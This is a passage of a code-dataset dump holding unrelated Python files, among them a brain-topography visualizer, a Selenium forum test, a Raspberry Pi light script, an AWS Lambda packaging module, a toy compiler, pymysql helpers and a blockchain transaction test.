\"\"\"\n Interface between TVB Framework and web display of a topography viewer.\n \"\"\"\n\n _ui_name = \"Topographic View\"\n _ui_subsection = \"topography\"\n\n\n def get_input_tree(self):\n return [{'name': 'data_0', 'label': 'Connectivity Measures 1',\n 'type': ConnectivityMeasure, 'required': True,\n 'conditions': FilterChain(fields=[FilterChain.datatype + '._nr_dimensions'],\n operations=[\"==\"], values=[1]),\n 'description': 'Punctual values for each node in the connectivity matrix. '\n 'This will give the colors of the resulting topographic image.'},\n {'name': 'data_1', 'label': 'Connectivity Measures 2', 'type': ConnectivityMeasure,\n 'conditions': FilterChain(fields=[FilterChain.datatype + '._nr_dimensions'],\n operations=[\"==\"], values=[1]),\n 'description': 'Comparative values'},\n {'name': 'data_2', 'label': 'Connectivity Measures 3', 'type': ConnectivityMeasure,\n 'conditions': FilterChain(fields=[FilterChain.datatype + '._nr_dimensions'],\n operations=[\"==\"], values=[1]),\n 'description': 'Comparative values'},\n {'name': 'display_contours', 'label': 'Display Contours', 'type': 'bool'}]\n\n\n def plot(self, figure, data_0, data_1=None, data_2=None, display_contours=True):\n \"\"\"\n Actual drawing method.\n \"\"\"\n connectivity = data_0.connectivity\n sensor_locations = BaseTopography._normalize(connectivity.centres)\n self.plot_contours = display_contours\n sensor_number = len(sensor_locations)\n\n arrays = []\n titles = []\n for measure in [data_0, data_1, data_2]:\n if measure is not None:\n if len(measure.connectivity.centres) != sensor_number:\n raise Exception(\"Use the same connectivity!!!\")\n arrays.append(measure.array_data.tolist())\n titles.append(measure.title)\n\n self.init_topography(sensor_locations)\n\n for i, array_data in enumerate(arrays):\n figure.add_subplot(1, len(arrays), i + 1)\n self.draw_head_topo(figure, array_data)\n figure.gca().set_title(titles[i])\n\n\n\n","sub_path":"tvb/adapters/visualizers/mplh5_topographic.py","file_name":"mplh5_topographic.py","file_ext":"py","file_size_in_byte":11707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"193848752","text":"import unittest\nfrom selenium import webdriver\nfrom testsuite.base_testcase import BaseTestCase\nfrom pageobject.discuz_login import LoginPage\nfrom pageobject.discuz2_page import Login_AdminUsername2\n\nclass Admin_Login_delmessage(BaseTestCase):\n # 实战二\n def test_adminLogin_delmessage(self):\n\n login_page = LoginPage(self.driver)\n admin_page = Login_AdminUsername2(self.driver)\n\n login_page.login_page('admin', \"admin\")\n login_page.login_first_page()\n admin_page.del_message_page()\n admin_page.admin_page()\n # admin_page.admin_page('admin')\n\n admin_page.new_block_page('自动化测试')\n login_page.end_login()\n login_page.login_page('chen','chen')\n admin_page.new_block_message()\n login_page.login_send_page('普通用户发帖标题','普通用户发帖内容%……&**——————————————')\n login_page.login_reply_page('普通用户回帖。。。。。。')\n\nif __name__=='__main__':\n unittest.main()","sub_path":"baidu01/testsuite/test_second_search.py","file_name":"test_second_search.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"450500737","text":"def withness(arr):\n count=0\n max=0\n for i in range(len(arr)-1,-1,-1):\n if arr[i]>max:\n max=arr[i]\n print(arr[i])\n count+=1\n return count\nif __name__ == \"__main__\":\n arr=[8,5,3,2,1]\n print(withness(arr))\n\n","sub_path":"find withness.py","file_name":"find withness.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"29276124","text":"# GPIO.BOARD 12 & 40 for the green lights\n# GPIO.BOARD 16 & 37 for the red lights\n# GPIO.BOARD 36 for the orange lights\n''' Created by Tan Solomon on 24th Dec 2016 from scratch :DDD\n\tThis file will run a total of 5 lights; 2 red, 2 green and 1 orange in a\n\tchristmas pattern. The layout is as follows;\n\tred - green - orange - green - red\n'''\nimport RPi.GPIO as GPIO\nimport time\n\nGPIO.setmode(GPIO.BOARD)\n\n# GPIO.setup(12,GPIO.OUT)\n# GPIO.setup(16,GPIO.OUT)\n# GPIO.setup(36,GPIO.OUT)\n# GPIO.setup(40,GPIO.OUT)\n\nyes = ['Y','y']\ngreen = [12,40]\nred = [37,16]\norange = [36]\n\nGPIO.setup(red+green+orange,GPIO.OUT)\n\nwhile True:\n\tanswer = raw_input(\"Do you wish to loop? (Y/N): \")\n\tif any(answer == i for i in yes):\n\n\t\tnoOfLoops = int(raw_input(\"How many loops would you like? Each loop is 1.2s: \"))\n\t\tfor i in range(noOfLoops):\n\t\t\t# Each loop takes 1.2 seconds and loops from the outermost lights to the innermost\n\t\t\tGPIO.output(red, True)\n\t\t\ttime.sleep(0.4)\n\t\t\tGPIO.output(red, False)\n\t\t\tGPIO.output(green, True)\n\t\t\ttime.sleep(0.4)\n\t\t\tGPIO.output(green, False)\n\t\t\tGPIO.output(36, True)\n\t\t\ttime.sleep(0.4)\n\t\t\tGPIO.output(36, False)\n\telse:\n\t\tbreak\n\n\n\nGPIO.cleanup()\n","sub_path":"RasPi/christmaslight.py","file_name":"christmaslight.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"628367689","text":"\"\"\"Finding duplicate letters in a word.\"\"\"\n\n__author__ = \"730389123\"\n\nword = str(input(\"Enter a word: \"))\ndup: bool = False \n\ni: int = 0\nwhile i < len(word):\n char = str(word[i])\n j: int = i + 1\n while j < len(word):\n test = str(word[j])\n if char == test:\n dup: bool = True\n j = j + 1\n i = i + 1\n\nif dup is False:\n print(\"Found duplicate: False\")\nelse:\n print(\"Found duplicate: True\")","sub_path":"exercises/ex03/find_duplicates.py","file_name":"find_duplicates.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"283276694","text":"# SCAR - Serverless Container-aware ARchitectures\n# Copyright (C) 2011 - GRyCAP - Universitat Politecnica de Valencia\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n\nimport os\nimport shutil\nimport src.logger as logger\nimport src.utils as utils\nimport subprocess\nimport tempfile\nfrom distutils import dir_util\nimport src.exceptions as excp\nfrom src.providers.aws.validators import AWSValidator\n\nMAX_PAYLOAD_SIZE = 50 * 1024 * 1024\nMAX_S3_PAYLOAD_SIZE = 250 * 1024 * 1024\n\ndef udocker_env(func):\n '''\n Decorator used to avoid losing the definition of the udocker\n environment variables (if any) \n '''\n def wrapper(*args, **kwargs):\n FunctionPackageCreator.save_tmp_udocker_env()\n func(*args, **kwargs)\n FunctionPackageCreator.restore_udocker_env()\n return wrapper\n\nclass FunctionPackageCreator():\n \n src_path = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\n aws_src_path = os.path.dirname(os.path.abspath(__file__))\n lambda_code_files_path = utils.join_paths(aws_src_path, \"cloud/lambda/\")\n os_tmp_folder = tempfile.gettempdir()\n scar_temporal_folder = utils.join_paths(os_tmp_folder, \"scar/\")\n \n supervisor_source = utils.join_paths(lambda_code_files_path, \"scarsupervisor.py\")\n \n udocker_file = \"udockerb\" if utils.is_binary_execution() else \"udockerpy\"\n udocker_source = utils.join_paths(lambda_code_files_path, udocker_file)\n udocker_dest = utils.join_paths(scar_temporal_folder, \"udockerb\")\n \n udocker_exec = [udocker_dest]\n udocker_tarball = \"\"\n udocker_dir = \"\"\n init_script_name = \"init_script.sh\"\n init_script_path = \"/var/task/{0}\".format(init_script_name)\n extra_payload_path = \"/var/task\"\n \n def __init__(self, package_props):\n self.properties = package_props\n self.lambda_code_name = \"{0}.py\".format(self.properties['FunctionName'])\n self.supervisor_dest = utils.join_paths(self.scar_temporal_folder, self.lambda_code_name)\n \n @excp.exception(logger)\n def prepare_lambda_code(self):\n self.clean_tmp_folders()\n self.add_mandatory_files()\n \n if 'DeploymentBucket' in self.properties and 'ImageId' in self.properties:\n self.download_udocker_image()\n if 'ImageFile' in self.properties:\n self.prepare_udocker_image()\n \n self.add_init_script() \n self.add_extra_payload()\n self.set_permissions()\n self.zip_scar_folder()\n self.check_code_size()\n\n def add_mandatory_files(self):\n os.makedirs(self.scar_temporal_folder, exist_ok=True)\n shutil.copy(utils.resource_path(self.supervisor_source), self.supervisor_dest)\n shutil.copy(utils.resource_path(self.udocker_source), self.udocker_dest)\n \n os.makedirs(utils.join_paths(self.scar_temporal_folder, \"src\"), exist_ok=True)\n \n initpy_source = utils.resource_path(utils.join_paths(self.lambda_code_files_path, \"__init__.py\"))\n self.initpy_dest = utils.join_paths(self.scar_temporal_folder, \"src/__init__.py\")\n shutil.copy(initpy_source, self.initpy_dest)\n \n utils_source = utils.resource_path(utils.join_paths(self.src_path, \"utils.py\"))\n self.utils_dest = utils.join_paths(self.scar_temporal_folder, \"src/utils.py\")\n shutil.copy(utils_source, self.utils_dest)\n \n exceptions_source = utils.resource_path(utils.join_paths(self.src_path, \"exceptions.py\"))\n self.exceptions_dest = utils.join_paths(self.scar_temporal_folder, \"src/exceptions.py\")\n shutil.copy(exceptions_source, self.exceptions_dest) \n \n self.set_environment_variable('UDOCKER_DIR', \"/tmp/home/udocker\")\n self.set_environment_variable('UDOCKER_LIB', \"/var/task/udocker/lib/\")\n self.set_environment_variable('UDOCKER_BIN', \"/var/task/udocker/bin/\")\n self.create_udocker_files()\n \n @udocker_env \n def create_udocker_files(self):\n self.execute_command(self.udocker_exec + [\"help\"], cli_msg=\"Packing udocker files\")\n \n def add_init_script(self):\n if 'Script' in self.properties:\n shutil.copy(self.properties['Script'], utils.join_paths(self.scar_temporal_folder, self.init_script_name))\n self.properties['EnvironmentVariables']['INIT_SCRIPT_PATH'] = self.init_script_path \n \n def add_extra_payload(self):\n if 'ExtraPayload' in self.properties:\n logger.info(\"Adding extra payload from {0}\".format(self.properties['ExtraPayload']))\n dir_util.copy_tree(self.properties['ExtraPayload'], self.scar_temporal_folder)\n self.set_environment_variable('EXTRA_PAYLOAD', self.extra_payload_path) \n \n def check_code_size(self):\n # Check if the code size fits within the aws limits \n if 'DeploymentBucket' in self.properties:\n AWSValidator.validate_s3_code_size(self.scar_temporal_folder, MAX_S3_PAYLOAD_SIZE)\n else:\n AWSValidator.validate_function_code_size(self.scar_temporal_folder, MAX_PAYLOAD_SIZE) \n \n def clean_tmp_folders(self):\n if os.path.isfile(self.properties['ZipFilePath']): \n utils.delete_file(self.properties['ZipFilePath'])\n # Delete created temporal files\n if os.path.isdir(self.scar_temporal_folder):\n shutil.rmtree(self.scar_temporal_folder, ignore_errors=True)\n \n def set_permissions(self):\n self.execute_command(['chmod', '0664', self.supervisor_dest])\n self.execute_command(['chmod', '0775', self.udocker_dest])\n self.execute_command(['chmod', '0664', self.initpy_dest])\n self.execute_command(['chmod', '0664', self.utils_dest])\n self.execute_command(['chmod', '0664', self.exceptions_dest])\n \n def zip_scar_folder(self):\n zip_exe = utils.resource_path(\"src/bin/zip\", bin_path='/usr/bin/zip')\n self.execute_command([zip_exe, \"-r9y\", self.properties['ZipFilePath'], \".\"],\n cmd_wd=self.scar_temporal_folder,\n cli_msg=\"Creating function package\")\n \n @classmethod\n def save_tmp_udocker_env(cls):\n #Avoid override global variables\n if utils.is_value_in_dict(os.environ, 'UDOCKER_TARBALL'):\n cls.udocker_tarball = os.environ['UDOCKER_TARBALL']\n if utils.is_value_in_dict(os.environ, 'UDOCKER_DIR'):\n cls.udocker_dir = os.environ['UDOCKER_DIR']\n # Set temporal global vars\n udocker_tarball = utils.resource_path(utils.join_paths(cls.lambda_code_files_path, \"udocker-1.1.0-RC2.tar.gz\"))\n utils.set_environment_variable('UDOCKER_TARBALL', udocker_tarball)\n utils.set_environment_variable('UDOCKER_DIR', utils.join_paths(cls.scar_temporal_folder, \"udocker\"))\n \n @classmethod \n def restore_udocker_env(cls):\n cls.restore_environ_var('UDOCKER_TARBALL', cls.udocker_tarball)\n cls.restore_environ_var('UDOCKER_DIR', cls.udocker_dir)\n \n @classmethod\n def restore_environ_var(cls, key, var):\n if var:\n utils.set_environment_variable(key, var)\n else:\n del os.environ[key] \n \n def execute_command(self, command, cmd_wd=None, cli_msg=None):\n cmd_out = subprocess.check_output(command, cwd=cmd_wd).decode(\"utf-8\")\n logger.info(cli_msg, cmd_out)\n return cmd_out[:-1]\n \n @udocker_env \n def prepare_udocker_image(self):\n image_path = utils.join_paths(self.os_tmp_folder, \"udocker_image.tar.gz\")\n shutil.copy(self.properties['ImageFile'], image_path)\n cmd_out = self.execute_command(self.udocker_exec + [\"load\", \"-i\", image_path], cli_msg=\"Loading image file\")\n self.create_udocker_container(cmd_out)\n self.set_environment_variable('IMAGE_ID', cmd_out)\n self.set_udocker_local_registry()\n \n @udocker_env \n def download_udocker_image(self):\n self.execute_command(self.udocker_exec + [\"pull\", self.properties['ImageId']], cli_msg=\"Downloading container image\")\n self.create_udocker_container(self.properties['ImageId'])\n self.set_udocker_local_registry()\n \n def create_udocker_container(self, image_id):\n if(utils.get_tree_size(self.scar_temporal_folder) < MAX_S3_PAYLOAD_SIZE/2):\n self.execute_command(self.udocker_exec + [\"create\", \"--name=lambda_cont\", image_id], cli_msg=\"Creating container structure\")\n if(utils.get_tree_size(self.scar_temporal_folder) > MAX_S3_PAYLOAD_SIZE):\n shutil.rmtree(utils.join_paths(self.scar_temporal_folder, \"udocker/containers/\")) \n \n def set_udocker_local_registry(self):\n self.set_environment_variable('UDOCKER_REPOS', '/var/task/udocker/repos/')\n self.set_environment_variable('UDOCKER_LAYERS', '/var/task/udocker/layers/') \n\n def set_environment_variable(self, key, val):\n if key and val:\n self.properties['EnvironmentVariables'][key] = val\n ","sub_path":"src/providers/aws/functioncode.py","file_name":"functioncode.py","file_ext":"py","file_size_in_byte":9672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"149866147","text":"class Solution:\n def buildTree(self, preorder: List[int], inorder: List[int]) -> TreeNode:\n def myBuildTree(preorder_left,preorder_right,inorder_left,inorder_right):\n if preorder_left > preorder_right:\n return None\n \n preorder_root = preorder_left\n inorder_root = index[preorder[preorder_root]]\n\n root = TreeNode(preorder[preorder_root])\n size_left_subtree = inorder_root - inorder_left\n\n root.left = myBuildTree(preorder_left+1,preorder_left+size_left_subtree,inorder_left,inorder_root-1)\n root.right = myBuildTree(preorder_left+size_left_subtree+1,preorder_right,inorder_root+1,inorder_right)\n return root\n\n n = len(preorder)\n\n index ={element:i for i, element in enumerate(inorder)}\n return myBuildTree(0,n-1,0,n-1)\n","sub_path":"Week_03/buildTree.py","file_name":"buildTree.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"11961464","text":"#逐行读取\n\"\"\"\nwith open('../chapter9/pi_digits.txt') as file_object:\n contents = file_object.read()\nprint(contents.rstrip())\n\"\"\"\n#创建一个包含文件各行内容的列表\n\"\"\"\nwith open('../chapter9/pi_digits.txt') as file_object:\n lines = file_object.readlines()\nfor line in lines:\n print(line.rstrip())\n\"\"\"\n#使用文件的内容\nfileName = 'pi_million_digits.txt';\nwith open(fileName) as file_object:\n lines = file_object.readlines();\npi_string = '';\nfor line in lines:\n pi_string += line.rstrip().lstrip();\nprint(pi_string)\nprint(len(pi_string))\nbirthday = input(\"Enter your birthday, in the form mmddyy: \")\nif birthday in pi_string:\n print('Your birthday appears in the first million digits of pi!')\nelse:\n print(\"Your birthday does not appear in the first million digits of pi.\")\npi_string = pi_string.replace('19716939','888888888')\nprint(pi_string)\n","sub_path":"chapter10/file_reader.py","file_name":"file_reader.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"317111330","text":"# -*- coding: utf-8 -*-\n\nclass Func(object):\n\n def __init__(self, name, args=()):\n self.name = name\n self.body = []\n self.args = dict(zip(args, [i for i in range(len(args))]))\n self.local = dict()\n\n def find_var(self, name):\n if name in self.args:\n return 'arg', self.args.get(name)\n return 'local', self.local.get(name)\n\n def add_var(self, name):\n idx = len(self.local)\n self.local[name] = idx\n return idx\n\n def write(self, statement):\n self.body.append(statement)\n\n def generate(self):\n header = ' '.join(('func', self.name, str(len(self.args)),))\n body = '\\n'.join(self.body)\n return '\\n'.join((header, body, 'return',))\n\n\nglobal_func = [\n \"\"\"\n func mult 2\n push const 0\n pop local 0\n push arg 1\n pop local 1\n label multloop\n push const 0\n push local 1\n eq\n ifgoto multend\n push local 0\n push arg 0\n add\n pop local 0\n push local 1\n push const 1\n sub\n pop local 1\n goto multloop\n label multend\n push local 0\n return\n \"\"\",\n]\n\n\nclass CodeGenerator(object):\n\n def __init__(self):\n self.init()\n\n def init(self):\n self.label_idx = 0\n self.funcs = dict(main=Func('main'))\n\n def compile(self, ir, func=None):\n if func is None: func = self.funcs.get('main')\n if isinstance(ir, int):\n s = 'push const ' + str(ir)\n func.write(s)\n elif isinstance(ir, str):\n space, idx = func.find_var(ir)\n s = 'push ' + space + ' ' + str(idx)\n func.write(s)\n elif not isinstance(ir, list):\n pass\n elif ir[0] == 'begin':\n for x in ir[1:]: self.compile(x, func)\n elif ir[0] == '+':\n for x in ir[1:]: self.compile(x, func)\n for _ in range(len(ir)-2): func.write('add')\n elif ir[0] == '-':\n self.compile(ir[1], func)\n for x in ir[2:]:\n self.compile(x, func)\n func.write('sub')\n elif ir[0] == '*':\n for x in ir[1:]: self.compile(x, func)\n for _ in range(len(ir)-2): func.write('call mult')\n elif ir[0] == '=':\n for x in ir[1:]: self.compile(x, func)\n for _ in range(len(ir)-2): func.write('eq')\n elif ir[0] == '>':\n self.compile(ir[1], func)\n for x in ir[2:]:\n self.compile(x, func)\n func.write('gt')\n elif ir[0] == '<':\n self.compile(ir[1], func)\n for x in ir[2:]:\n self.compile(x, func)\n func.write('lt')\n elif ir[0] == 'define':\n return self._define(ir, func)\n elif ir[0] == 'set!':\n self.compile(ir[2], func)\n space, idx = func.find_var(ir[1])\n s = 'pop ' + space + ' ' + str(idx)\n func.write(s)\n elif ir[0] == 'if':\n self.compile(ir[1], func)\n func.write('ifgoto '+str(self.label_idx))\n self.compile(ir[3], func)\n func.write('goto '+str(self.label_idx+1))\n func.write('label '+str(self.label_idx))\n self.compile(ir[2], func)\n func.write('label '+str(self.label_idx+1))\n else:\n for x in ir[1:]: self.compile(x, func)\n func.write('call '+ir[0]) \n\n def _define(self, ir, func):\n if isinstance(ir[1], str):\n self.compile(ir[2], func)\n idx = func.add_var(ir[1])\n func.write('pop local '+str(idx))\n if isinstance(ir[1], list):\n name, *args = ir[1]\n def_func = Func(name, args)\n self.funcs[name] = def_func\n self.compile(ir[2], def_func)\n\n def generate(self):\n func_text = '\\n'.join([func.generate() for _, func in self.funcs.items()])\n global_text = '\\n'.join(global_func)\n return global_text + '\\n' + func_text\n\n def __call__(self, ir):\n self.init()\n self.compile(ir)\n return self.generate()\n","sub_path":"app/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":4158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"275131738","text":"#-*- coding: UTF-8 -*-\n'''\nCreated on 2013-11-9\n\n@author: xubo\n\n为红楼梦建立一个倒排索引\n'''\n\ninputpath = \"redwords.txt\"\n#inputpath = \"redtest.txt\"\noutputpath = \"redindex.txt\"\n \n\nword_dict = dict()\n\ninputfile = open(inputpath,'r')\nlines = inputfile.readlines()\nfor line in lines:\n line = line.rstrip()\n words = line.split(\"\\t\")\n word_count = words[0]\n word = words[1]\n for i in range(len(word)/3):\n term = word[3*i:3*i+3]\n if term not in word_dict:\n word_dict[term] = set()\n word_dict[term].add(word_count)\n \n\n\noutputfile = open(outputpath,'w')\nfor k,v in word_dict.iteritems():\n outputfile.write(\"%s\\t%s\\n\" %(k,\" \".join(v)))","sub_path":"reverseindex.py","file_name":"reverseindex.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"10075442","text":"from keras.models import load_model, save_model\n\nfrom Chromosome import Chromosome\n\nimport pickle\n\nimport os\nimport os.path\n\n#TODO: add save functionality\n\n'''\n Data access object to saving and loading DNN classes. Loads keras models and Chromosome (s).\n'''\nclass DNN_dao:\n\n def __init__ (self):\n self.CHROMOSOME_FILENAME = 'chromosome'\n self.MODEL_FILENAME = 'model.hdf5'\n\n self.model = None\n self.chromosome = None\n\n '''\n Loads a saved DNN object and its Chromosome. Sets self.model and self.chromosome.\n\n Args: _directoryPath = string, folder path to load from\n '''\n def load (self, _directoryPath):\n print('loading model from', _directoryPath)\n\n # save current working directory\n oldPath = os.getcwd()\n\n # go into save folder\n if os.path.exists(_directoryPath):\n os.chdir(_directoryPath)\n else:\n raise Exception ('DNN save directory path does not exist:', _directoryPath)\n\n print('\\n', os.path.exists(self.CHROMOSOME_FILENAME), '\\n')\n # load chromosome if it exists\n if os.path.exists(self.CHROMOSOME_FILENAME):\n print('\\nloading chromosome\\n')\n self.chromosome = Chromosome.load(self.CHROMOSOME_FILENAME)\n\n # load model if it exists\n if os.path.exists(self.MODEL_FILENAME):\n print('\\nloading model\\n')\n self.model = load_model(self.MODEL_FILENAME)\n else:\n raise Exception ('DNN model save file not present:', self.MODEL_FILENAME)\n\n # restore current working directory\n os.chdir(oldPath)\n\n '''\n Saves a DNN object and its Chromosome if present.\n\n Args: _directoryPath = folder path to save DNN to\n _dnn = DNN object to save\n '''\n def save (self, _directoryPath, _dnn):\n print('saving DNN to', _directoryPath, '/', self.MODEL_FILENAME)\n\n # save current working directory\n oldPath = os.getcwd()\n\n # check if path exists. if not, create it and go in\n if not os.path.exists(_directoryPath):\n os.makedirs(_directoryPath, exist_ok=True)\n os.chdir(_directoryPath)\n\n # save Chromosome if it exists\n if _dnn.get_chromosome() != None:\n print('\\nsaving chromosome\\n')\n\n try:\n _dnn.get_chromosome().save(self.CHROMOSOME_FILENAME)\n except Exception as e:\n raise e\n\n # save DNN model\n try:\n _dnn.get_model().save(self.MODEL_FILENAME)\n except Exception as e:\n raise e\n\n # restore current working directory\n os.chdir(oldPath)\n\n '''\n Returns the loaded Keras model.\n\n Returns:Model = Keras sequential model\n '''\n def get_model (self):\n if self.model == None:\n raise Exception ('No model to return')\n return self.model\n\n '''\n Returns the loaded Chromosome object, if it exists.\n\n Returns:Chromosome = Chromosome object\n '''\n def get_chromosome (self):\n if self.chromosome == None:\n raise Exception ('No chromosome to return')\n return self.chromosome\n\n","sub_path":"folder-to-turn-in/DNN_dao.py","file_name":"DNN_dao.py","file_ext":"py","file_size_in_byte":3192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"626847480","text":"\"\"\"\n@Time:2018/2/10 17:56\n@Author:qingliu\n@Source:ECNU Online Judge\n@Problem:3213\n@Website:http://acm.ecnu.edu.cn/problem/3213/\n\"\"\"\n\"\"\"\nN 头奶牛被紧急动员起来了,它们排成了一条长列。从左向右看,排在第 i 个位置的奶牛身高为 Hi。约翰一声令下,所有奶牛向右看齐。假设每头奶牛只能看到比自己高的牛。请问它们各自看到的最近的一头奶牛分别是谁呢?\n\nInput\n 第一行:单个整数 N,1≤N≤106\n\n 第二行到 N+1 行:第 i+1 行有一个整数 Hi,1≤Hi≤106\n\nOutput\n 第一行到第 N 行:第 i 行有一个整数 Ci,表示第 i 头奶牛向右看到的最近的一头奶牛编号,如果看不到任何奶牛,Ci 为 0\nExamples\n input\n 6\n 3\n 2\n 6\n 1\n 1\n 2\n output\n 3\n 3\n 0\n 6\n 6\n 0\n\"\"\"\n# 算法思想:\n# 利用单调栈\nN = int(input())\nH = [0]\nmonoStack = []\nresult = [0] * (N+1)\nfor i in range(N):\n H.append(int(input()))\nfor i in range(1, N+1):\n while len(monoStack) > 0 and H[monoStack[-1]] < H[i]:\n result[monoStack[-1]] = i\n monoStack.pop()\n monoStack.append(i)\ndel result[0]\nprint(*result, sep='\\n')\n","sub_path":"2.数据结构/1.栈/3213.向右看齐.py","file_name":"3213.向右看齐.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"30171286","text":"import geopandas as gpd\nimport pandas as pd\nfrom numpy import log\n\ndef Syntax_normalizer(df):\n \"\"\"\n This function returns normalised Choice and Integration values based on Space Syntax literature.\n \n NaCH = logCH+1/logTD+3\n NaIN = NC^1.2/TD\n \n \"\"\"\n #extracting the useful columns\n useful_cols = [i[6:] for i in df.columns if (i[:5]==\"T1024\")]\n \n #extracting the radii that need to be calculated\n radii = [int(r.split()[1][1:]) for r in useful_cols if r[:6]==\"Choice\"]\n\n #creating the column names\n NaCh_colnames = [\"NaCh_\"+str(r) for r in radii]\n NaIn_colnames = [\"NaIn_\"+str(r) for r in radii]\n \n # empty dictionary to store all calculation with their keys\n normalized_dct = {}\n for rad, NaCh_col_name, NaIn_col_name in zip(radii, NaCh_colnames, NaIn_colnames):\n #slice the dataframe with relevant columns\n choice = df[\"T1024 Choice R%s metric\" % str(rad)]\n tdepth = df[\"T1024 Total Depth R%s metric\" % str(rad)]\n ncount = df[\"T1024 Node Count R%s metric\" % str(rad)]\n\n NaCh_vals = log(choice+1) / log(tdepth+3)\n NaIn_vals = ncount**1.2 / tdepth\n\n normalized_dct[NaCh_col_name] = NaCh_vals\n normalized_dct[NaIn_col_name] = NaIn_vals\n \n #convert dictionary to dataframe \n newdf = pd.DataFrame(normalized_dct)\n #join the new dataframe with the input DataFrame (based on index)\n df = df.join(newdf)\n \n print(\"The following columns have been added successfully:\\n\",NaCh_colnames,\"\\n\",NaIn_colnames,\"\\n\")\n return df","sub_path":"Syntax_functions.py","file_name":"Syntax_functions.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"448540720","text":"# 클래스로 정의함.\n\nimport pymysql\n\nclass DB_Utils:\n\n def queryExecutor(self, db, sql, params):\n conn = pymysql.connect(host='localhost', user='guest', password='bemyguest', db=db, charset='utf8')\n\n try:\n with conn.cursor(pymysql.cursors.DictCursor) as cursor: # dictionary based cursor\n cursor.execute(sql, params)\n tuples = cursor.fetchall()\n return tuples\n except Exception as e:\n print(e)\n print(type(e))\n finally:\n conn.close()\n\n def updateExecutor(self, db, sql, params):\n conn = pymysql.connect(host='localhost', user='guest', password='bemyguest', db=db, charset='utf8')\n\n try:\n with conn.cursor() as cursor:\n cursor.execute(sql, params)\n conn.commit()\n except Exception as e:\n print(e)\n print(type(e))\n finally:\n conn.close()\n\nclass DB_Queries:\n # 모든 검색문은 여기에 각각 하나의 메소드로 정의\n\n def selectPlayer(self, position):\n sql = \"SELECT * FROM player WHERE position = %s\"\n params = (position)\n\n util = DB_Utils()\n tuples = util.queryExecutor(db=\"kleague\", sql=sql, params=params)\n return tuples\n\nclass DB_Updates:\n # 모든 갱신문은 여기에 각각 하나의 메소드로 정의\n\n def insertPlayer(self, player_id, player_name, team_id, position):\n sql = \"INSERT INTO player (player_id, player_name, team_id, position) VALUES (%s, %s, %s, %s)\"\n params = (player_id, player_name, team_id, position)\n\n util = DB_Utils()\n util.updateExecutor(db=\"kleague\", sql=sql, params=params)\n\n#########################################\n\nif __name__ == \"__main__\": # DBAPI_5.py가 실행될 때 __main__ (True), import될 때는 모듈명 즉 DBAPI_5 (False)\n query = DB_Queries()\n players = query.selectPlayer(\"GK\")\n print(len(players))\n print(players)\n print()\n\n update = DB_Updates()\n update.insertPlayer(\"2020001\", \"홍길동\", \"K01\", \"GK\")\n\n players = query.selectPlayer(\"GK\")\n print(len(players))\n print(players)\n","sub_path":"Part1/DBAPI_5.py","file_name":"DBAPI_5.py","file_ext":"py","file_size_in_byte":2187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"191556356","text":"from neutro.src.chain import transaction\nfrom neutro.src.chain.transaction import Transaction\nfrom neutro.src.util import cryptoutil\nfrom neutro.src.util import wallet\n\n\ndef test_transaction():\n \"\"\"base test for transaction\"\"\"\n sender = \"iWVjc8hWuRuePAv1X8nDZdcjKcqivDUH62YKhBXBHqp2yGfgeXyHJDj5XwCHwjWB6GevCjMYT59XSBiQvMYHQ4P\"\n receivers = [\"01\", \"02\", \"0a\"]\n amounts = [1, 2, 3]\n fee = 100\n tx = Transaction(sender, receivers, amounts, fee)\n\n assert tx.string() == \\\n '{\"sender\": \"iWVjc8hWuRuePAv1X8nDZdcjKcqivDUH62YKhBXBHqp2yGfgeXyHJDj5XwCHwjWB6GevCjMYT59XSBiQvMYHQ4P\", \"receivers\": [\"01\", \"02\", \"0a\"], \"amounts\": [1, 2, 3], \"nonce\": 0, \"fee\": 100, \"signature\": \"\"}'\n assert tx.hash() == \"a564b3a98ed7d3f66b69ee4d9f7fab588a875ae06c6f7919c7f83121bb72f859\"\n\n\ndef test_unsigned_hash():\n \"\"\"test the unisgned_hash of tx\"\"\"\n sender = \"abcd\"\n receivers = [\"fe\"]\n amounts = [1]\n fee = 100\n tx = Transaction(sender, receivers, amounts, fee)\n # get hashes\n tx_signed_hash = tx.hash()\n tx_unsigned_hash = tx.unsigned_hash()\n # no signature means equivalent hashes\n assert tx_signed_hash == tx_unsigned_hash\n # set signature\n tx.signature = 